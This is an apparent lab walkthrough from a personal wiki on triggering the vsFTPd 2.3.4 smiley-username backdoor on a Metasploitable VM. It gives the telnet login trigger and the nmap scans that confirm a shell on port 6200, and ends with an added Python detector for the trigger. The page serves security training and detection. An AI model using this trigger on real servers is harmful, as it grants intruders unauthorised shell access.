Metasploitable/VSFTP: Difference between revisions
From charlesreid1
Revision as of 13:35, 25 March 2016
=The Background=
VSFTP is an FTP server program. The particular version of VSFTP included on the Metasploitable virtual machine contains a vulnerability that opens a backdoor shell.
If a client attempts to log in with a username that ends in a smiley <code>:)</code>, the server opens a backdoor shell listening on port 6200.
=Opening the Backdoor=
The procedure for opening a backdoor on port 6200 with VSFTP is as follows:
We begin by scanning the Metasploitable virtual machine at 10.0.0.27, to show that port 6200 is closed:
<pre>
root@morpheus:~# nmap -sS -sV -A -p 6200 10.0.0.27

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 06:29 PDT
Nmap scan report for 10.0.0.27
Host is up (0.00083s latency).
PORT     STATE  SERVICE VERSION
6200/tcp closed unknown
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.83 ms 10.0.0.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.96 seconds
</pre>
Now, in another window, we open the backdoor:
<pre>
root@morpheus:~# telnet 10.0.0.27 21
Trying 10.0.0.27...
Connected to 10.0.0.27.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass doesnotmatter
</pre>
You can close that window - you're done with it.
Now take a look at the same port 6200 with nmap:
<pre>
root@morpheus:~# nmap -sS -sV -A -p 6200 10.0.0.27

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 06:30 PDT
WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
Nmap scan report for 10.0.0.27
Host is up (0.00088s latency).
PORT     STATE SERVICE VERSION
6200/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port6200-TCP:V=7.01%I=7%D=3/25%Time=56F53D70%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,42,"sh:\x20line\x201:\x20\r:\x20command\x20not\x20found\nsh:
SF:\x20line\x202:\x20\r:\x20command\x20not\x20found\n");
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4.21
OS details: Linux 2.4.21
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.88 ms 10.0.0.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.94 seconds
</pre>
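As an added example (not from the original wiki page), a small detector for the trigger this page describes: it reads the lines of an FTP control-channel session, flags a vsFTPd 2.3.4 banner and any USER command whose username ends in <code>:)</code>, and names the port where the backdoor shell would appear. The sample sessions are constructed from the telnet exchange above; the regexes, class and function names are assumptions of this example.

```python
"""Detect the vsftpd 2.3.4 smiley-backdoor trigger in FTP control traffic."""
import re
from dataclasses import dataclass

AFFECTED_VERSION = "2.3.4"   # banner shown by the affected build on this page
BACKDOOR_PORT = 6200         # where the triggered shell listens
BANNER_RE = re.compile(r"^220 \(vsFTPd (?P<ver>[0-9.]+)\)")
USER_RE = re.compile(r"^USER\s+(?P<name>.+?)\s*$", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    severity: str
    line_no: int
    message: str


def scan_session(lines):
    """Scan one FTP control-channel session (a list of lines).

    Flags a server banner advertising vsFTPd 2.3.4 and any USER command
    whose username ends in ':)', the trigger described on this page.
    """
    findings = []
    for n, raw in enumerate(lines, start=1):
        line = raw.rstrip("\r\n")
        banner = BANNER_RE.match(line)
        if banner:
            if banner.group("ver") == AFFECTED_VERSION:
                findings.append(Finding("high", n,
                    f"server banner advertises vsFTPd {AFFECTED_VERSION}"))
            continue
        user = USER_RE.match(line)
        if user and user.group("name").endswith(":)"):
            findings.append(Finding("critical", n,
                f"USER {user.group('name')!r} ends in ':)'; "
                f"check for an unexpected listener on tcp/{BACKDOOR_PORT}"))
    return findings


# Constructed sample: the telnet exchange on this page as the client and
# server lines would appear in a capture of the control channel.
TRIGGER_SESSION = [
    "220 (vsFTPd 2.3.4)",
    "user backdoored:)",
    "331 Please specify the password.",
    "pass doesnotmatter",
]
# Constructed benign session for comparison: newer version, plain username.
BENIGN_SESSION = ["220 (vsFTPd 3.0.3)", "USER alice", "331 Please specify the password."]
```

A critical finding from the USER check should be followed by confirming whether tcp/6200 is now listening on the host, which is exactly what the second nmap scan above shows.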